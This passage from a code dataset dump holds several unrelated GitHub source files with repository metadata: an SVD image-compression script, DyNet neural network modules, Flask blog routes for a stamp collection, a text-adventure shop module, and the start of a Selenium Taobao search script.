np.matrix((vt_matrix[:i, :]))\r\n pyplot.imshow(reconstruct, cmap='gray')\r\n title = str(i)\r\n pyplot.title(\"p = \" + title)\r\n pyplot.axis('off')\r\n pyplot.show()\r\n for i in range(10, 101, 10):\r\n reconstruct = np.matrix(u_matrix[:, :i]) * np.diag(s_matrix[:i]) * np.matrix(vt_matrix[:i, :])\r\n pyplot.imshow(reconstruct, cmap='gray')\r\n title = str(i)\r\n pyplot.title(\"p = \" + title)\r\n pyplot.axis('off')\r\n pyplot.show()\r\n\r\n\r\ndef small_comp(u_matrix, s_matrix, vt_matrix,\r\n img): # Finding the smallest iterationg before compression becomes negative\r\n for i in range(0, 100):\r\n reconstruct = np.matrix(u_matrix[:, :i]) * np.diag(s_matrix[:i]) * np.matrix(vt_matrix[:i, :])\r\n compression = 1 - ((i * img.shape[0]) + i + (i * img.shape[1])) / (img.shape[0] * img.shape[1])\r\n title = str(i)\r\n if compression < 0:\r\n print(\r\n \"\\n4. Negative values for compression occur as the p value gets large as a result of more pixels are being used to create the output image as there are in the original picture, this is because more matrix values are in the reconstruct image as the orignal and these values are still plotted. 
\\nAt p = \" + title + \" the p value is the smallest when compression becomes negative (\" + (\r\n \"{:.1%}\".format(compression)) + \")\")\r\n break\r\n\r\n\r\ndef threec(img, u_matrix, s_matrix, vt_matrix): # p, max error, mean error, compression % for all compression levels\r\n p_list = []\r\n emax = []\r\n emean = []\r\n comp = []\r\n for i in range(1, 6):\r\n reconstruct = np.matrix(u_matrix[:, :i]) * np.diag(s_matrix[:i]) * np.matrix((vt_matrix[:i, :]))\r\n p_list.append(str(i))\r\n max_err = str(np.amax(abs(img - reconstruct)))\r\n emax.append(str(\"{:.3f}\".format(float(max_err))))\r\n mean_err = str(np.mean(abs(img - reconstruct)))\r\n emean.append(str(\"{:.3f}\".format(float(mean_err))))\r\n compression_percent = 1 - ((i * img.shape[0]) + i + (i * img.shape[1])) / (img.shape[0] * img.shape[1])\r\n if float(compression_percent) < 0:\r\n comp.append(\"N/A\")\r\n else:\r\n comp.append(str(\"{:.1%}\".format(float(compression_percent))))\r\n for i in range(10, 101, 10):\r\n reconstruct = np.matrix(u_matrix[:, :i]) * np.diag(s_matrix[:i]) * np.matrix((vt_matrix[:i, :]))\r\n p_list.append(str(i))\r\n max_err = str(np.amax(abs(img - reconstruct)))\r\n emax.append(str(\"{:.3f}\".format(float(max_err))))\r\n mean_err = str(np.mean(abs(img - reconstruct)))\r\n emean.append(str(\"{:.3f}\".format(float(mean_err))))\r\n compression_percent = 1 - ((i * img.shape[0]) + i + (i * img.shape[1])) / (img.shape[0] * img.shape[1])\r\n if float(compression_percent) < 0:\r\n comp.append(\"N/A\")\r\n else:\r\n comp.append(str(\"{:.1%}\".format(float(compression_percent))))\r\n d = {\"p = \": p_list, \"Max error\": emax, \"Mean error\": emean, \"Compression\": comp}\r\n print(\"\\n3. \")\r\n print(pd.DataFrame(data=d))\r\n\r\n\r\ndef threed(img, u_matrix, s_matrix, vt_matrix, p_value): # What compression im happy with and why\r\n print(\"\\n5. The most compressed approximation that is acceptable for me is when p = \" + str(\r\n p_value) + \" . I feel that at a normal viewing distance between the user and the computer the compression past this point shows nearly no signs of improvement. If I was to can the viewing distance to be between me and a TV then I assume you can take a very low p value (high compression) as the image is so small that differences in pixels would be nearly impossible to spot.\")\r\n reconstruct = np.matrix(u_matrix[:, :p_value]) * np.diag(s_matrix[:p_value]) * np.matrix(vt_matrix[:p_value, :])\r\n compression_percent = \"{:.1%}\".format(\r\n 1 - ((p_value * img.shape[0]) + p_value + (p_value * img.shape[1])) / (img.shape[0] * img.shape[1]))\r\n mean_err = str(np.mean(abs(img - reconstruct)))\r\n print(\"Compression = \" + str(compression_percent) + \". 
Mean error = \" + str(\"{:.3f}\".format(float(mean_err))))\r\n\r\n\r\ndef main():\r\n image = read_pgm(\"me2.pgm\")\r\n display_pgm(image)\r\n u_matrix, s_matrix, vt_matrix = svd(image)\r\n u_pic = u(u_matrix)\r\n s_pic = s(s_matrix)\r\n vt_pic = vt(vt_matrix)\r\n p_values = recon(u_pic, s_pic, vt_pic, image)\r\n c_answer = threec(image, u_pic, s_pic, vt_pic)\r\n small_p = small_comp(u_pic, s_pic, vt_pic, image)\r\n d_answer = threed(image, u_pic, s_pic, vt_pic, 40)\r\n\r\n\r\nmain()\r\n","repo_name":"RSpe/SVD-Reconstruction","sub_path":"SVD Image Reconstruction.py","file_name":"SVD Image Reconstruction.py","file_ext":"py","file_size_in_byte":7093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18698871233","text":"import dynet as dy\nimport numpy as np\n\ndef orthonormal_initializer(output_size, input_size):\n \"\"\"\n adopted from Timothy Dozat https://github.com/tdozat/Parser/blob/master/lib/linalg.py\n \"\"\"\n # print (output_size, input_size)\n I = np.eye(output_size)\n lr = .1\n eps = .05/(output_size + input_size)\n success = False\n tries = 0\n while not success and tries < 10:\n Q = np.random.randn(input_size, output_size) / np.sqrt(output_size)\n for i in range(100):\n QTQmI = Q.T.dot(Q) - I\n loss = np.sum(QTQmI**2 / 2)\n Q2 = Q**2\n Q -= lr*Q.dot(QTQmI) / (np.abs(Q2 + Q2.sum(axis=0, keepdims=True) + Q2.sum(axis=1, keepdims=True) - 1) + eps)\n if np.max(Q) > 1e6 or loss > 1e6 or not np.isfinite(loss):\n tries += 1\n lr /= 2\n break\n success = True\n if success:\n # print('Orthogonal pretrainer loss: %.2e' % loss)\n pass\n else:\n # print('Orthogonal pretrainer failed, using non-orthogonal random matrix')\n Q = np.random.randn(input_size, output_size) / np.sqrt(output_size)\n return np.transpose(Q.astype(np.float32))\n\ndef set_orthonormal(p):\n p.set_value(orthonormal_initializer(p.shape()[0], p.shape[1]))\n\ndef clip_all(model, low=-1, high=1):\n for p in model.parameter_list():\n p.clip_inplace(low, high)\n\ndef leaky_relu(x):\n return dy.bmax(.1*x, x)\n\n\n# class MLP(object):\n# def __init__(self, model, di, dh, do):\n# self.model = model\n# self.bh = model.add_parameters(dh)\n# self.wh = model.add_parameters((dh, di))\n# self.bo = model.add_parameters(do)\n# self.wo = model.add_parameters((do, dh))\n\n# def forward(self, x):\n# h = dy.affine_transform([self.bh, self.wh, x])\n# o = dy.affine_transform([self.bo, self.wo, dy.tanh(h)])\n# return o\n\nclass MLP(object):\n def __init__(self, model, di, do, *dhs):\n self.model = model\n ds = [di] + list(dhs) + [do]\n self.bs = [model.add_parameters(d) for d in ds[1:]]\n self.ws = [model.add_parameters((j, i)) for i, j in zip(ds, ds[1:])]\n\n\n def forward(self, x):\n for i, (b, w) in enumerate(zip(self.bs, self.ws)):\n if i:\n x = leaky_relu(x)\n x = dy.affine_transform([b, w, x])\n return x\n\nclass TreeLSTM(object):\n def __init__(self, model, dm, att_type):\n self.model = model \n self.att_type = att_type\n self.WS = [self.model.add_parameters((dm, dm), init=orthonormal_initializer(dm, dm)) for _ in \"iouf\"]\n self.US = [self.model.add_parameters((dm, dm), init=orthonormal_initializer(dm, dm)) for _ in \"iouf\"]\n self.BS = [self.model.add_parameters(dm) for _ in \"iouf\"]\n\n if self.att_type == 'att' or self.att_type == 'selfatt':\n self.attention = Attention(model, dm, dm)\n if self.att_type == 'selfatt':\n self.self_attention = Attention(model, dm, dm)\n\n\n def state(self, x, hs=None, cs=None):\n if not hs:\n # initial state\n Wi, Wo, Wu, Wf = self.WS\n bi, 
bo, bu, bf = self.BS\n\n i = dy.logistic(dy.affine_transform([bi, Wi, x]))\n o = dy.logistic(dy.affine_transform([bo, Wo, x]))\n u = dy.tanh(dy.affine_transform([bu, Wu, x]))\n c = dy.cmult(i, u)\n h = dy.cmult(o, dy.tanh(c))\n return h, c\n else:\n # transduce\n Ui, Uo, Uu, Uf = self.US\n bi, bo, bu, bf = self.BS\n Wi, Wo, Wu, Wf = self.WS\n\n if self.att_type == 'selfatt':\n hm = dy.concatenate_cols(hs)\n hm = self.self_attention.encode(hm)\n hm = self.attention.encode(hm, x)\n elif self.att_type == 'att':\n hm = dy.concatenate_cols(hs)\n hm = self.attention.encode(hm, x)\n else:\n hm = dy.esum(hs)\n\n i = dy.logistic(dy.affine_transform([bi, Ui, hm, Wi, x]))\n o = dy.logistic(dy.affine_transform([bo, Uo, hm, Wo, x]))\n u = dy.tanh(dy.affine_transform([bu, Uu, hm, Wu, x]))\n fs = [dy.logistic(dy.affine_transform([bf, Uf, h, Wf, x])) for h in hs]\n c_out = dy.cmult(i, u) + dy.esum([dy.cmult(f, c) for f, c in zip(fs, cs)])\n h_out = dy.cmult(o, dy.tanh(c_out))\n return h_out, c_out\n\n\nclass Attention(object):\n \"\"\"\n A module for both self attention and normal attention with key, query and value\n \"\"\"\n def __init__(self, model, dm, dk, dq=None):\n # dm = memory dimension\n # dk = key dimension\n # dq = query dimension (None for self-attention)\n dq = dq or dm\n self.w_q = model.add_parameters((dk, dq), init=orthonormal_initializer(dk, dq)) \n self.w_k = model.add_parameters((dk, dm), init=orthonormal_initializer(dk, dm))\n self.w_v = model.add_parameters((dk, dm), init=orthonormal_initializer(dk, dm))\n self.factor = dk ** 0.5\n\n def encode(self, memory, query=None):\n query = query or memory # if no query then self attention\n Q = self.w_q * query\n K = self.w_k * memory\n V = self.w_v * memory\n A = dy.softmax(dy.transpose(K) * Q / self.factor)\n out = V * A\n return out\n\n\nclass GlimpsePointer:\n def __init__(self, model, token_dim, query_dim=None):\n self.model = model\n query_dim = query_dim or token_dim\n self.att_q = self.model.add_parameters((token_dim, query_dim), \n init=orthonormal_initializer(token_dim, query_dim))\n self.att_q2 = self.model.add_parameters((token_dim, token_dim + query_dim), \n init=orthonormal_initializer(token_dim, token_dim+query_dim))\n\n def point(self, seq_vec, cand_mat):\n # combined glimpse and attend\n cand_mat_trans = dy.transpose(cand_mat)\n a = dy.softmax(cand_mat_trans * (self.att_q * seq_vec))\n cand_vec = cand_mat * a\n q = dy.concatenate([seq_vec, cand_vec])\n s = cand_mat_trans * (self.att_q2 * q)\n return s\n\n def glimpse(self, seq_vec, cand_mat, cand_mat_trans):\n a = dy.softmax(cand_mat_trans * (self.att_q * seq_vec))\n cand_vec = cand_mat * a\n return cand_vec\n\n def attend(self, seq_vec, cand_mat_trans):\n # assume the seq_vec is concatenated with cand_vec\n s = cand_mat_trans * (self.att_q2 * seq_vec)\n return s\n\n\nclass SimplePointer:\n def __init__(self, model, token_dim, query_dim=None):\n self.model = model\n query_dim = query_dim or token_dim\n self.att_q = self.model.add_parameters((token_dim, query_dim), \n init=orthonormal_initializer(token_dim, query_dim))\n\n def point(self, seq_vec, cand_mat):\n cand_mat_trans = dy.transpose(cand_mat)\n s = cand_mat_trans * (self.att_q * seq_vec)\n return s\n\nclass SelfPointer:\n def __init__(self, model, token_dim, query_dim=None):\n self.model = model\n query_dim = query_dim or token_dim\n self.att_q = self.model.add_parameters((token_dim, query_dim), \n init=orthonormal_initializer(token_dim, query_dim))\n self.self_attention = Attention(self.model, token_dim, token_dim)\n\n 
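# --- Editor's note (added by the editor, not part of the original file) ---
# The Attention module used by these pointer classes is single-head scaled
# dot-product attention: with projections Q = Wq.query, K = Wk.memory and
# V = Wv.memory it computes A = softmax(K^T Q / sqrt(d_k)) and returns V A --
# the same attend-then-mix pattern as in "Attention Is All You Need", written
# column-wise because DyNet stores a sequence as a (dim x length) matrix.
# --- end editor's note ---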
def point(self, seq_vec, cand_mat):\n cand_mat = self.self_attention.encode(cand_mat)\n cand_mat_trans = dy.transpose(cand_mat)\n s = cand_mat_trans * (self.att_q * seq_vec)\n return s\n\nclass BiaffineAttention:\n def __init__(self, model, token_dim, hid_dim, self_attention=False):\n self.mlp_fr = MLP(model, token_dim, hid_dim)\n self.mlp_to = MLP(model, token_dim, hid_dim)\n self.attention_fr = Attention(model, token_dim, token_dim) if self_attention else None\n self.attention_to = Attention(model, token_dim, token_dim) if self_attention else None\n self.biaffine = model.add_parameters((hid_dim+1, hid_dim+1), \n # init=dy.ConstInitializer(0.))\n init=orthonormal_initializer(hid_dim+1, hid_dim+1))\n\n def attend(self, fr_vecs, to_vecs):\n fr_mat = dy.concatenate_cols(fr_vecs)\n to_mat = dy.concatenate_cols(to_vecs)\n\n if self.attention_fr:\n fr_mat = self.attention_fr.encode(fr_mat)\n to_mat = self.attention_to.encode(to_mat)\n\n fr_mat = leaky_relu(self.mlp_fr.forward(fr_mat))\n fr_mat = dy.concatenate([fr_mat, dy.inputTensor(np.ones((1, len(fr_vecs)), dtype=np.float32))])\n to_mat = leaky_relu(self.mlp_to.forward(to_mat))\n to_mat = dy.concatenate([to_mat, dy.inputTensor(np.ones((1, len(to_vecs)), dtype=np.float32))])\n score_mat = dy.transpose(fr_mat) * self.biaffine * to_mat\n return score_mat\n\nclass BilinearAttention:\n def __init__(self, model, token_dim, hid_dim):\n self.mlp_fr = MLP(model, token_dim, hid_dim)\n self.mlp_to = MLP(model, token_dim, hid_dim)\n self.biaffine = model.add_parameters((hid_dim, hid_dim),\n # init=dy.ConstInitializer(0.))\n init=orthonormal_initializer(hid_dim, hid_dim))\n\n def attend(self, fr_vecs, to_vecs):\n fr_mat = dy.concatenate_cols(fr_vecs)\n to_mat = dy.concatenate_cols(to_vecs)\n score_mat = dy.transpose(leaky_relu(self.mlp_fr.forward(fr_mat))) * \\\n self.biaffine * \\\n leaky_relu(self.mlp_to.forward(to_mat))\n return score_mat\n\nclass PairAttention:\n def __init__(self, model, token_dim, hid_dim):\n self.mlp_fr = MLP(model, token_dim, hid_dim)\n self.mlp_to = MLP(model, token_dim, hid_dim)\n self.mlp_att = MLP(model, hid_dim*2, 1, hid_dim)\n\n def attend(self, fr_vecs, to_vecs):\n fr_vecs = [leaky_relu(self.mlp_fr.forward(f)) for f in fr_vecs]\n to_vecs = [leaky_relu(self.mlp_to.forward(t)) for t in to_vecs]\n score_mat = dy.concatenate_cols([dy.concatenate([self.mlp_att.forward(dy.concatenate([f, t]))\n for t in to_vecs])\n for f in fr_vecs])\n return score_mat\n\n\n\n\n\n\n\n","repo_name":"EggplantElf/IMSurReal","sub_path":"IMSurReal/dynet_modules.py","file_name":"dynet_modules.py","file_ext":"py","file_size_in_byte":10221,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"34"} +{"seq_id":"3437409220","text":"from flask import render_template, flash, redirect, url_for, request, abort\nfrom stamp_manager import app, db, bcrypt\nfrom stamp_manager.forms import RegistrationForm, LoginForm, UpdateAccountForm, PostForm\nfrom stamp_manager.models import User, Post\nfrom stamp_manager.data import Articles\nfrom flask_login import login_user, current_user, logout_user, login_required\nimport secrets\nimport os\nfrom PIL import Image\n\n\nArticles = Articles()\n\n\n@app.route('/')\n@app.route('/home')\ndef home():\n page = request.args.get('page', 1, type=int)\n posts = Post.query.order_by(Post.date_posted.desc()).paginate(page=page, per_page=3)\n return render_template('home.html', title=\"Home\", posts=posts)\n\n\n@app.route('/about')\ndef about():\n return render_template('about.html', 
title=\"About\")\n\n\n@app.route('/articles')\ndef articles():\n return render_template('articles.html', articles=Articles, title=\"Sammelgebiete\")\n\n\n@app.route('/article//')\ndef article(title):\n return render_template('article.html', title=title)\n\n\n@app.route(\"/register\", methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = RegistrationForm()\n if form.validate_on_submit():\n hashed_password = bcrypt.generate_password_hash(\n form.password.data).decode('utf-8')\n user = User(username=form.username.data,\n email=form.email.data, password=hashed_password)\n db.session.add(user)\n db.session.commit()\n\n flash(f'Account created for {form.username.data}!', 'success')\n return redirect(url_for('login'))\n return render_template('register.html', title='Register', form=form)\n\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(email=form.email.data).first()\n if user and bcrypt.check_password_hash(user.password, form.password.data):\n login_user(user, remember=form.remember.data)\n next_page = request.args.get('next')\n flash('Succesfully logged in!', 'success')\n return redirect(next_page) if next_page else redirect(url_for('home'))\n else:\n flash(f'Login not successful!', 'danger')\n return render_template('login.html', title='Login', form=form)\n\n\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n return redirect(url_for('home'))\n\n# funtion to save updated picture and return filename as random hex\n\n\ndef save_picture(form_picture):\n random_hex = secrets.token_hex(8)\n # get extension from orig file\n _, f_ext = os.path.splitext(form_picture.filename)\n picture_fn = random_hex + f_ext # build new filename\n picture_path = os.path.join(\n app.root_path, 'static/pics', picture_fn) # build new filepath\n output_size = (125, 125)\n i = Image.open(form_picture)\n i.thumbnail(output_size)\n i.save(picture_path)\n return picture_fn\n\n\n@app.route(\"/account\", methods=['GET', 'POST'])\n@login_required\ndef account():\n form = UpdateAccountForm()\n if form.validate_on_submit():\n\n if form.picture.data:\n picture_file = save_picture(\n form.picture.data) # call function above\n current_user.image_file = picture_file # update picture\n current_user.username = form.username.data # update username\n current_user.email = form.email.data # update email\n db.session.commit()\n flash('Account updated', 'success')\n return redirect(url_for('account'))\n elif request.method == 'GET':\n form.username.data = current_user.username\n form.email.data = current_user.email\n\n image_file = url_for('static', filename=\"pics/\" + current_user.image_file)\n return render_template('account.html', title='Account', image_file=image_file, form=form)\n\n\n@app.route(\"/post/new\", methods=['GET', 'POST'])\n@login_required\ndef new_post():\n form = PostForm()\n if form.validate_on_submit():\n post = Post(title=form.title.data,\n content=form.content.data, author=current_user)\n db.session.add(post)\n db.session.commit()\n flash('You post has been created', 'success')\n return redirect(url_for('home'))\n return render_template('create_post.html', title='New Post', form=form, legend='New Post')\n\n\n@app.route(\"/post/\")\ndef post(post_id):\n post = Post.query.get_or_404(post_id)\n return render_template('post.html', title=post.title, 
post=post)\n\n\n@app.route(\"/post//update\", methods=['GET', 'POST'])\n@login_required\ndef update_post(post_id):\n post = Post.query.get_or_404(post_id)\n if post.author != current_user:\n abort(403)\n form = PostForm()\n if form.validate_on_submit():\n post.title = form.title.data\n post.content = form.content.data\n db.session.commit()\n flash('Post updated', 'success')\n return redirect(url_for('post', post_id=post.id))\n elif request.method == 'GET':\n form.title.data = post.title\n form.content.data = post.content\n return render_template('create_post.html', title='Update Post', form=form, legend='Update Post')\n\n\n@app.route(\"/post//delete\", methods=['GET', 'POST'])\n@login_required\ndef delete_post(post_id):\n post = Post.query.get_or_404(post_id)\n if post.author != current_user:\n abort(403)\n db.session.delete(post)\n db.session.commit()\n flash('Your post has been deleted', 'success')\n return redirect(url_for('home'))\n\n\n\n@app.route('/user/')\ndef user_posts(username):\n page = request.args.get('page', 1, type=int)\n user = User.query.filter_by(username=username).first_or_404()\n posts = Post.query.filter_by(author=user)\\\n .order_by(Post.date_posted.desc())\\\n .paginate(page=page, per_page=3)\n return render_template('user_posts.html', user=user, posts=posts)\n","repo_name":"WeichselRiver/StampManager","sub_path":"stamp_manager/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":6036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"12072325362","text":"import varModule as var\nfrom formatModule import breakline,inbreakline,error\nimport roomModule as room\nimport fightModule as fight\nimport timeModule as time\n\ndef armoury():\n breakline()\n print(\"You step into the armoury, looking about at all of their wares, various things lining the walls, shields, maces, swords, a gruff looking man stands behind the counter, and you can hear ruslting and clanging coming from somewhere in the back. \\\"Look before you ask for anything here, we're still getting a bit set up. So we are only selling a few things.\\\" The man says as you look around. \\\"We don't want to sell everything and then not be able to get more stock. Feel free to look at what's on that board over on the far wall for what we are willing to currently sell. Also if you want to try out some of your equipment, there's a dummy over in that corner I was thinking of getting rid of you can use.\\\"\")\n print(\"\\n You may buy some equipment. (buy)\")\n print(\" You can train with the dummy. (train)\")\n print(\" You may exit the building. 
(exit)\")\n answer = input(\"\\nEnter command here => \")\n if answer.lower().strip() == \"exit\":\n var.doTurn = False\n room.mercantile()\n elif answer.lower().strip() == \"buy\":\n armouryStore()\n elif answer.lower().strip() == \"train\":\n var.doTurn = False\n training()\n else:\n error()\n armoury()\n\ndef armouryStore():\n inbreakline()\n print(\"Currently what the armoury will sell is quite limited.\")\n print(\"\\n You can buy (weapons)\")\n print(\" You can buy (ammunition)\")\n print(\" You can (exit) this menu.\")\n answer = input(\"\\nEnter command here => \")\n if answer.lower().strip() == \"weapons\":\n armouryStoreWeapons()\n elif answer.lower().strip() == \"ammunition\":\n armouryStoreAmmunition()\n elif answer.lower().strip() == \"exit\":\n armoury()\n else:\n error()\n armouryStore()\n\ndef armouryStoreWeapons():\n inbreakline()\n if var.hasBow == False:\n print(\"Bow = 10 unity (bow)\")\n if var.hasSling == False:\n print(\"Sling = 8 unity (sling)\")\n print(\"Chakram = 4 unity (chakram)\")\n if var.hasSword == False:\n print(\"Sword = 8 unity (sword)\")\n if var.hasMace == False:\n print(\"Mace = 10 unity (mace)\")\n print(\"Dagger = 6 Unity (dagger)\")\n print(\"You can (exit) this menu.\")\n answer = input(\"\\nEnter command here => \")\n if answer.lower().strip() == \"sling\":\n inbreakline()\n if var.hasSling == False:\n if var.unifiedCount >= 8:\n print(\"You purchase one [1] SLING.\")\n var.hasSling = True\n var.unifiedCount -= 8\n else:\n print(\"You do not have enough money to buy that!\")\n else:\n print(\"You already have a sling.\")\n armouryStoreWeapons()\n elif answer.lower().strip() == \"bow\":\n inbreakline()\n if var.hasBow == False:\n if var.unifiedCount >= 10:\n print(\"You purchase one [1] BOW.\")\n var.hasBow = True\n var.unifiedCount -= 10\n else:\n print(\"You do not have enough money to buy that!\")\n else:\n print(\"You already have a bow.\")\n armouryStoreWeapons()\n elif answer.lower().strip() == \"chakram\":\n inbreakline()\n if var.unifiedCount >= 4:\n print(\"You purchase one [1] CHAKRAM\")\n var.chakrams += 1\n var.unifiedCount -= 4\n else:\n print(\"You do not have enough money to buy that!\")\n armouryStoreWeapons()\n elif answer.lower().strip() == \"sword\":\n inbreakline()\n if var.hasSword == False:\n if var.unifiedCount >= 8:\n print(\"You purchase one [1] SWORD.\")\n var.hasSword = True\n var.unifiedCount -= 8\n else:\n print(\"You don't have enough money to buy that!\")\n else:\n print(\"You already have a sword.\")\n armouryStoreWeapons()\n elif answer.lower().strip() == \"mace\":\n inbreakline()\n if var.hasMace == False:\n if var.unifiedCount >= 10:\n print(\"You purchase one [1] MACE.\")\n var.hasMace = True\n var.unifiedCount -= 10\n else:\n print(\"You don't have enough money to buy that!\")\n else:\n print(\"You already have a mace.\")\n armouryStoreWeapons()\n elif answer.lower().strip() == \"dagger\":\n inbreakline()\n if var.unifiedCount >= 6:\n print(\"You purchase one [1] DAGGER.\")\n var.daggers += 1\n var.unifiedCount -= 6\n else:\n print(\"You don't have enough money to buy that!\")\n armouryStoreWeapons()\n elif answer.lower().strip() == \"exit\":\n inbreakline()\n print(\"Exiting the menu.\")\n armouryStore()\n else:\n error()\n armouryStoreWeapons()\n\ndef armouryStoreAmmunition():\n inbreakline()\n print(\"4 arrows = 3 unity (arrows)\")\n print(\"6 shot = 3 unity (shot)\")\n print(\"You can (exit) this menu.\")\n answer = input(\"\\nEnter command here => \")\n inbreakline()\n if answer.lower().strip() == 
\"arrows\":\n if var.unifiedCount >= 3:\n print(\"You purchase a bundle of arrows.\")\n var.arrows += 4\n var.unifiedCount -= 3\n else:\n print(\"You don't have the money to buy that!\")\n armouryStoreAmmunition()\n elif answer.lower().strip() == \"shot\":\n if var.unifiedCount >= 3:\n print(\"You purchase a handful of shot.\")\n var.shot += 6\n var.unifiedCount -= 3\n else:\n print(\"You don't have enough money to buy that!\")\n armouryStoreAmmunition()\n elif answer.lower().strip() == \"exit\":\n print(\"Closing the menu.\")\n armouryStore()\n else:\n error()\n armouryStoreAmmunition()\n\ndef trainingIntro():\n inbreakline()\n print(\"You are now in a mock fight with the dummy. It will not fight back, and all EXP gains will be quartered \")\n\ndef training():\n time.turnInc()\n fight.playerFightStats()\n print(\"\\n You can end your training (end)\")\n print(\" You can attack! (attack)\")\n print(\" You can use your alchemical skills! (alchemy)\")\n print(\" You can change your weapon. (weapon)\")\n answer = input(\"\\nEnter command here => \")\n fight.playerFightStats()\n if answer.lower().strip() == \"end\":\n fight.recovery()\n armoury()\n elif answer.lower().strip() == \"attack\":\n var.EXPdiluter = 4\n fight.attack()\n print(f\"\\nYou do {var.finalAttack} damage!\")\n training()\n elif answer.lower().strip() == \"weapon\":\n fight.switchWeapon()\n training()\n elif answer.lower().strip() == \"alchemy\":\n fight.alchemy()\n training()\n else:\n var.doTurn = False\n error()\n training()\n\n#GENERAL STORE\n\njustEntered = False\n\ndef generalStore():\n global justEntered\n if justEntered == True:\n breakline()\n print(f\"As you step into the general store, a bell rings, and a not two seconds later a figure is at your side. turning to look you see a glowingly happy face just about a foot away from your own. \\\"Greetings! How are you today?! {var.talkList[0]} Well either way welcome to Hrath-Ryn's General Store! I hope you can find what you need, and if you can't, {var.talkList[1]}\\\" She points to the counter where a demon leans on their elbow looking bored. He gives you a quick look and then returns to looking at the counter. \\\"He's not very good with people he doesn't know, but he's nice. He'll even jingle the bell for you!\\\" She gives a little bow and quickly bounds away behind some curtains.\")\n justEntered = False\n inbreakline()\n else:\n breakline()\n print(\"You stand in a general store. It seem s that variety of things are sold here, but only a few look useful to you right now.\")\n print(\"\\n You can buy something. (buy)\")\n print(f\" You may approach {var.talkList[2]}. (approach)\")\n print(\" You may jingle the bell on the counter. (jingle)\")\n print(\" You may exit the store. (exit)\")\n answer = input(\"\\nEnter command here => \")\n if answer.lower().strip() == \"buy\":\n generalStoreStore()\n elif answer.lower().strip() == \"approach\":\n ...\n elif answer.lower().strip() == \"jingle\":\n ...\n elif answer.lower().strip() == \"exit\":\n room.mercantile()\n else:\n error()\n generalStore()\n\n#GENERAL STORE STORE\n\ndef generalStoreStore():\n inbreakline()\n print(f\"As you browse the wares and think about your purchases, {var.talkList[2]} eyes follow you, his tails flicking about behind him, boredly fidgeting with each other.\")\n if var.flasks < 2:\n print(\"\\n Flask = 4 U= (flask)\")\n if var.pouchs < 4:\n print(\" Pill Pouch = 4 U= (pouch)\")\n print(\" You may exit this menu. 
(exit)\")\n answer = input(\"\\nEnter command here => \")\n if answer.lower().strip() == \"flask\" and var.flasks < 2 and var.unifiedCount > 3:\n inbreakline()\n purchased(\"flask\")\n var.flasks += 1\n var.flaskContent.append(\"EMPTY\")\n generalStoreStore()\n elif answer.lower().strip() == \"flask\" and var.flasks < 2 and var.unifiedCount < 4:\n inbreakline()\n cantPurchase(\"flask\",\"U=\")\n generalStoreStore()\n elif answer.lower().strip() == \"pouch\" and var.pouchs < 4 and var.unifiedCount > 3:\n inbreakline()\n purchased(\"flask\")\n var.pouchs += 1\n var.pouchContent.append(\"EMPTY\")\n generalStoreStore()\n elif answer.lower().strip() == \"pouch\" and var.pouchs < 4 and var.unifiedCount < 4:\n inbreakline()\n cantPurchase(\"flask\",\"U=\")\n elif answer.lower().strip() == \"exit\":\n inbreakline()\n print(\"Exiting the menu.\")\n generalStore()\n else:\n error()\n generalStoreStore()\n\n#PURCHASED\n\ndef purchased(name):\n print(f\"You purchased a {name}.\")\n\ndef cantPurchase(name,currency):\n print(f\"You do not have enough {currency} to purchase a {name}.\")\n\n#APPROACH SHO'TSAHL\nshoTalked = False\n\ndef approachShoTsahl():\n global talked\n inbreakline()\n print(f\"You walk up to {var.talkList[2]}, his tails stop fidgeting and he raises his head from his hands, still looking bored. \\\"What is it?\\\"\")\n print(f\"\\n You may talk to {var.talkList[2]} (talk)\")\n print(f\" You may look at {var.talkList[2]}'s appearance. (look)\")\n print(\" You may leave him alone. (exit)\")\n answer = input(\"\\nEnter command here => \")\n if answer.lower().strip() == \"talk\":\n ...\n elif answer.lower().strip() == \"look\":\n ...\n elif answer.lower().strip() == \"exit\":\n inbreakline()\n if shoTalked == False:\n print(f\"You hear {var.talkList[2]} mumble \\\"Why do they have to be so weird?\\\" under his breath as you walk away.\")\n else:\n print(f\"Before you turn around to leave, you hear {var.talkList[2]} say \")","repo_name":"Scribe2theFiends/Psychescape-Prog","sub_path":"mercantileModule.py","file_name":"mercantileModule.py","file_ext":"py","file_size_in_byte":11114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25860087099","text":"# coding: utf-8\nfrom selenium import webdriver\nimport time\n\n# 1.创建浏览器对象\ndriver = webdriver.Firefox()\n# 2.打开淘宝首页\ndriver.get('http://www.taobao.com')\n# 3.找到搜索输入框\nsearch_ele = driver.find_element_by_id('q')\n# 4.输入搜索关键词\nsearch_ele.send_keys(u'冰姨凉茶铺')\n# 5.找到搜索按钮\nsearch_btn = driver.find_element_by_class_name('btn-search')\n# 6.点击按钮\nsearch_btn.click()\n# 打开文件\nfile_handle = open('shops.txt', 'wb+')\nfor i in range(1, 3):\n print\n '正在爬取第%s页数据.......' 
